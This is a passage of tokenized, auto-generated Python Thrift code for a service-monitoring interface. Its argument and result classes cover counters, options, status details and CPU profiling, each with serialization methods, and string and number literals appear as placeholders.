<EOL> ( <NUM_LIT:0> , TType . I32 , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . I32 : <EOL> self . success = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . I32 , <NUM_LIT:0> ) <EOL> oprot . writeI32 ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatusDetails_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatusDetails_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounters_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounters_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . MAP , '<STR_LIT:success>' , ( TType . STRING , None , TType . I64 , None ) , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . MAP : <EOL> self . success = { } <EOL> ( _ktype1 , _vtype2 , _size0 ) = iprot . readMapBegin ( ) <EOL> for _i4 in xrange ( _size0 ) : <EOL> _key5 = iprot . readString ( ) ; <EOL> _val6 = iprot . readI64 ( ) ; <EOL> self . success [ _key5 ] = _val6 <EOL> iprot . readMapEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . MAP , <NUM_LIT:0> ) <EOL> oprot . writeMapBegin ( TType . STRING , TType . I64 , len ( self . success ) ) <EOL> for kiter7 , viter8 in self . success . items ( ) : <EOL> oprot . writeString ( kiter7 ) <EOL> oprot . writeI64 ( viter8 ) <EOL> oprot . writeMapEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounter_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , key = None , ) : <EOL> self . key = key <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounter_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . I64 , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . I64 : <EOL> self . success = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . I64 , <NUM_LIT:0> ) <EOL> oprot . writeI64 ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class setOption_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , key = None , value = None , ) : <EOL> self . key = key <EOL> self . value = value <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class setOption_result : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOption_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , key = None , ) : <EOL> self . key = key <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOption_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOptions_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOptions_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . MAP , '<STR_LIT:success>' , ( TType . STRING , None , TType . STRING , None ) , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . MAP : <EOL> self . success = { } <EOL> ( _ktype10 , _vtype11 , _size9 ) = iprot . readMapBegin ( ) <EOL> for _i13 in xrange ( _size9 ) : <EOL> _key14 = iprot . readString ( ) ; <EOL> _val15 = iprot . readString ( ) ; <EOL> self . success [ _key14 ] = _val15 <EOL> iprot . readMapEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . MAP , <NUM_LIT:0> ) <EOL> oprot . writeMapBegin ( TType . STRING , TType . STRING , len ( self . success ) ) <EOL> for kiter16 , viter17 in self . success . items ( ) : <EOL> oprot . writeString ( kiter16 ) <EOL> oprot . writeString ( viter17 ) <EOL> oprot . writeMapEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCpuProfile_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . I32 , '<STR_LIT>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , profileDurationInSec = None , ) : <EOL> self . profileDurationInSec = profileDurationInSec <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . I32 : <EOL> self . profileDurationInSec = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . profileDurationInSec != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:1> ) <EOL> oprot . writeI32 ( self . profileDurationInSec ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCpuProfile_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> 